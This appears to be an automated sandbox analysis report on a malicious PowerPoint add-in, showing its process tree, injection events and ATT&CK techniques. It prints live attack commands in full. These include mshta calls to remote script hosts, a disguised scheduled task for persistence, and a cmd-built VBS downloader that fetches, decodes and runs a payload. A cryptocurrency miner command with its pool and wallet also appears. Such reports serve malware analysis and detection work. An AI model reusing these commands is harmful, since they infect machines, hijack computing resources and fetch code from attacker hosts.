Token: SeUndockPrivilege	1972	powershell.exe
Token: SeManageVolumePrivilege	1972	powershell.exe
Token: 33	1972	powershell.exe
Token: 34	1972	powershell.exe
Token: 35	1972	powershell.exe
Token: SeDebugPrivilege	1684	aspnet_compiler.exe
Token: 33	1092	mmc.exe
Token: SeIncBasePriorityPrivilege	1092	mmc.exe
Token: 33	1092	mmc.exe
Token: SeIncBasePriorityPrivilege	1092	mmc.exe
Token: 33	1092	mmc.exe
Token: SeIncBasePriorityPrivilege	1092	mmc.exe
Token: 33	1092	mmc.exe
Token: SeIncBasePriorityPrivilege	1092	mmc.exe
Token: 33	1092	mmc.exe
Token: SeIncBasePriorityPrivilege	1092	mmc.exe
Token: 33	1092	mmc.exe
Token: SeIncBasePriorityPrivilege	1092	mmc.exe
Token: 33	1092	mmc.exe
Token: SeIncBasePriorityPrivilege	1092	mmc.exe
Token: 33	1092	mmc.exe
Token: SeIncBasePriorityPrivilege	1092	mmc.exe
Token: 33	1092	mmc.exe
Token: SeIncBasePriorityPrivilege	1092	mmc.exe
Token: 33	1092	mmc.exe
Token: SeIncBasePriorityPrivilege	1092	mmc.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1092	mmc.exe
1092	mmc.exe
1684	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 1088 wrote to memory of 1760	1088	POWERPNT.EXE	29
PID 1088 wrote to memory of 1760	1088	POWERPNT.EXE	29
PID 1088 wrote to memory of 1760	1088	POWERPNT.EXE	29
PID 1088 wrote to memory of 1760	1088	POWERPNT.EXE	29
PID 1088 wrote to memory of 1148	1088	POWERPNT.EXE	31
PID 1088 wrote to memory of 1148	1088	POWERPNT.EXE	31
PID 1088 wrote to memory of 1148	1088	POWERPNT.EXE	31
PID 1088 wrote to memory of 1148	1088	POWERPNT.EXE	31
PID 1148 wrote to memory of 852	1148	mshta.exe	37
PID 1148 wrote to memory of 852	1148	mshta.exe	37
PID 1148 wrote to memory of 852	1148	mshta.exe	37
PID 1148 wrote to memory of 852	1148	mshta.exe	37
PID 1148 wrote to memory of 2028	1148	mshta.exe	39
PID 1148 wrote to memory of 2028	1148	mshta.exe	39
PID 1148 wrote to memory of 2028	1148	mshta.exe	39
PID 1148 wrote to memory of 2028	1148	mshta.exe	39
PID 1148 wrote to memory of 1728	1148	mshta.exe	41
PID 1148 wrote to memory of 1728	1148	mshta.exe	41
PID 1148 wrote to memory of 1728	1148	mshta.exe	41
PID 1148 wrote to memory of 1728	1148	mshta.exe	41
PID 1972 wrote to memory of 1684	1972	powershell.exe	43
PID 1972 wrote to memory of 1684	1972	powershell.exe	43
PID 1972 wrote to memory of 1684	1972	powershell.exe	43
PID 1972 wrote to memory of 1684	1972	powershell.exe	43
PID 1972 wrote to memory of 1684	1972	powershell.exe	43
PID 1972 wrote to memory of 1684	1972	powershell.exe	43
PID 1972 wrote to memory of 1684	1972	powershell.exe	43
PID 1972 wrote to memory of 1684	1972	powershell.exe	43
PID 1972 wrote to memory of 1684	1972	powershell.exe	43
PID 1288 wrote to memory of 2012	1288	taskeng.exe	46
PID 1288 wrote to memory of 2012	1288	taskeng.exe	46
PID 1288 wrote to memory of 2012	1288	taskeng.exe	46
PID 2012 wrote to memory of 2056	2012	mshta.EXE	47
PID 2012 wrote to memory of 2056	2012	mshta.EXE	47
PID 2012 wrote to memory of 2056	2012	mshta.EXE	47
PID 2056 wrote to memory of 2244	2056	mshta.exe	49
PID 2056 wrote to memory of 2244	2056	mshta.exe	49
PID 2056 wrote to memory of 2244	2056	mshta.exe	49
PID 2244 wrote to memory of 2328	2244	cmd.exe	51
PID 2244 wrote to memory of 2328	2244	cmd.exe	51
PID 2244 wrote to memory of 2328	2244	cmd.exe	51
PID 2328 wrote to memory of 2488	2328	WScript.exe	53
PID 2328 wrote to memory of 2488	2328	WScript.exe	53
PID 2328 wrote to memory of 2488	2328	WScript.exe	53
PID 2488 wrote to memory of 2616	2488	bin.txt	54
PID 2488 wrote to memory of 2616	2488	bin.txt	54
PID 2488 wrote to memory of 2616	2488	bin.txt	54
PID 2488 wrote to memory of 2616	2488	bin.txt	54
PID 2488 wrote to memory of 2616	2488	bin.txt	54
PID 2488 wrote to memory of 2616	2488	bin.txt	54
PID 2488 wrote to memory of 2616	2488	bin.txt	54

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\PO - CE AUSTRALIA PTY LTD.ppam"
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
PID:1088
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1760
- C:\Windows\SysWOW64\mshta.exe
  mshta http://www.j.mp/llsoaskokcdokoktewelvw
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:1148
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/19.html""\"", 0 : window.close"\")
    3⤵
    - Creates scheduled task(s)
    PID:852
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2028
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /f /im winword.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
  #cmd
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: SetClipboardViewer
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:1684

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1092

C:\Windows\system32\taskeng.exe
taskeng.exe {B00DF911-0968-4DF1-A991-E19D0E670AFB} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1288
- C:\Windows\system32\mshta.EXE
  C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""mshta http://1230948%[email protected]/p/19.html"", 0 : window.close")
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" http://1230948[email protected]/p/19.html
    3⤵
    - Blocklisted process makes network request
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    PID:2056
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>lulupupugugugagamotherfucker.vbs &@echo dim stream_obj >>lulupupugugugagamotherfucker.vbs &@echo dim shell_obj >>lulupupugugugagamotherfucker.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>lulupupugugugagamotherfucker.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>lulupupugugugagamotherfucker.vbs &@echo set shell_obj = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>lulupupugugugagamotherfucker.vbs &@echo URL = "https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_39e7aca5ca73408f9ea38510ed3aa48e.txt">>lulupupugugugagamotherfucker.vbs &@echo http_obj.open "GET", URL, False >>lulupupugugugagamotherfucker.vbs &@echo http_obj.send >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.type = 1 >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.open >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.write http_obj.responseBody >>lulupupugugugagamotherfucker.vbs &@echo stream_obj.savetofile "C:\Users\Public\scan.txt", 2 >>lulupupugugugagamotherfucker.vbs &@echo Dim xxx >>lulupupugugugagamotherfucker.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>lulupupugugugagamotherfucker.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\scan.txt", 1) >>lulupupugugugagamotherfucker.vbs &@echo content = file.ReadAll >>lulupupugugugagamotherfucker.vbs &@echo content = StrReverse(content) >>lulupupugugugagamotherfucker.vbs &@echo Dim fso >>lulupupugugugagamotherfucker.vbs &@echo Dim fdsafdsa >>lulupupugugugagamotherfucker.vbs &@echo Dim oNode, fdsaa >>lulupupugugugagamotherfucker.vbs &@echo Const adTypeBinary = 1 >>lulupupugugugagamotherfucker.vbs &@echo Const adSaveCreateOverWrite = 2 >>lulupupugugugagamotherfucker.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>lulupupugugugagamotherfucker.vbs &@echo oNode.dataType = "bin.base64">>lulupupugugugagamotherfucker.vbs &@echo oNode.Text = content >>lulupupugugugagamotherfucker.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Type = adTypeBinary >>lulupupugugugagamotherfucker.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.txt") >>lulupupugugugagamotherfucker.vbs &@echo LocalFile = tempdir >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Open >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>lulupupugugugagamotherfucker.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>lulupupugugugagamotherfucker.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>lulupupugugugagamotherfucker.vbs &@echo Set fdsafdsa = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") >>lulupupugugugagamotherfucker.vbs &@echo If (fso.FileExists(LocalFile)) Then >>lulupupugugugagamotherfucker.vbs &@echo fdsafdsa.Exec (LocalFile) >>lulupupugugugagamotherfucker.vbs &@echo End If >>lulupupugugugagamotherfucker.vbs& lulupupugugugagamotherfucker.vbs &dEl lulupupugugugagamotherfucker.vbs
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2244
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\lulupupugugugagamotherfucker.vbs"
        5⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of WriteProcessMemory
        
        PID:2328
      - C:\Users\Public\bin.txt
        
        C:\Users\Public\bin.txt
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2488
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe -B --donate-level=1 -a cryptonight --url=pool.supportxmr.com:5555 -u 8AsWuFbYMBQQFKBWQDAMiqgZnQLSQjB7p6hrYwxdocCvFdgJjYjckDiLGTEzwGRidoTZjnobmuwChgcNawxgur9f7i9fb88 -p x -R --variant=-1 -t 1 --max-cpu-usage=50
        7⤵
        
        PID:2616

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:2768

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x154
1⤵
PID:2872

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1088-59-0x0000000073811000-0x0000000073815000-memory.dmp

Filesize
16KB

Download
memory/1088-66-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1088-61-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1088-60-0x0000000070EB1000-0x0000000070EB3000-memory.dmp

Filesize
8KB

Download
memory/1092-100-0x0000000003FAB000-0x0000000003FAC000-memory.dmp

Filesize
4KB

Download
memory/1092-89-0x00000000028C0000-0x00000000028C1000-memory.dmp

Filesize
4KB

Download
memory/1092-95-0x0000000003FA9000-0x0000000003FAA000-memory.dmp

Filesize
4KB

Download
memory/1092-94-0x0000000003FA8000-0x0000000003FA9000-memory.dmp

Filesize
4KB

Download
memory/1092-96-0x0000000003FAC000-0x0000000003FAD000-memory.dmp

Filesize
4KB

Download
memory/1092-97-0x0000000003FAD000-0x0000000003FAE000-memory.dmp

Filesize
4KB

Download
memory/1092-98-0x000007FFFFF00000-0x000007FFFFF01000-memory.dmp

Filesize
4KB

Download
memory/1092-101-0x0000000003FB0000-0x0000000003FB2000-memory.dmp

Filesize
8KB

Download
memory/1092-92-0x0000000003F88000-0x0000000003FA7000-memory.dmp

Filesize
124KB

Download
memory/1092-99-0x0000000003FAA000-0x0000000003FAB000-memory.dmp

Filesize
4KB

Download
memory/1092-93-0x000000001D990000-0x000000001D9A9000-memory.dmp

Filesize
100KB

Download
memory/1092-90-0x0000000003F80000-0x0000000003F82000-memory.dmp

Filesize
8KB

Download
memory/1092-91-0x000007FEE8F00000-0x000007FEE9F96000-memory.dmp

Filesize
16.6MB

Download
memory/1148-65-0x0000000075281000-0x0000000075283000-memory.dmp

Filesize
8KB

Download
memory/1684-87-0x00000000042C0000-0x00000000042C1000-memory.dmp

Filesize
4KB

Download
memory/1684-85-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/1684-83-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/1684-142-0x00000000042C1000-0x00000000042C2000-memory.dmp

Filesize
4KB

Download
memory/1760-63-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmp

Filesize
8KB

Download
memory/1972-78-0x000000001C2D0000-0x000000001C2D1000-memory.dmp

Filesize
4KB

Download
memory/1972-76-0x0000000002540000-0x0000000002541000-memory.dmp

Filesize
4KB

Download
memory/1972-77-0x000000001B860000-0x000000001B861000-memory.dmp

Filesize
4KB

Download
memory/1972-82-0x000000001B6C0000-0x000000001B6D2000-memory.dmp

Filesize
72KB

Download
memory/1972-74-0x000000001ABB4000-0x000000001ABB6000-memory.dmp

Filesize
8KB

Download
memory/1972-73-0x000000001ABB0000-0x000000001ABB2000-memory.dmp

Filesize
8KB

Download
memory/1972-72-0x00000000025E0000-0x00000000025E1000-memory.dmp

Filesize
4KB

Download
memory/1972-81-0x000000001B570000-0x000000001B572000-memory.dmp

Filesize
8KB

Download
memory/1972-80-0x000000001B560000-0x000000001B564000-memory.dmp

Filesize
16KB

Download
memory/1972-70-0x000000001ACB0000-0x000000001ACB1000-memory.dmp

Filesize
4KB

Download
memory/1972-68-0x0000000002470000-0x0000000002471000-memory.dmp

Filesize
4KB

Download
memory/2488-133-0x000000013FBF0000-0x000000013FBF1000-memory.dmp

Filesize
4KB

Download
memory/2488-135-0x0000000000920000-0x0000000000922000-memory.dmp

Filesize
8KB

Download
memory/2616-136-0x0000000140000000-0x0000000140717000-memory.dmp

Filesize
7.1MB

Download
memory/2616-138-0x0000000140000000-0x0000000140717000-memory.dmp

Filesize
7.1MB

Download
memory/2616-139-0x0000000001B40000-0x0000000001B54000-memory.dmp

Filesize
80KB

Download
memory/2616-140-0x00000000020C0000-0x00000000020E0000-memory.dmp

Filesize
128KB

Download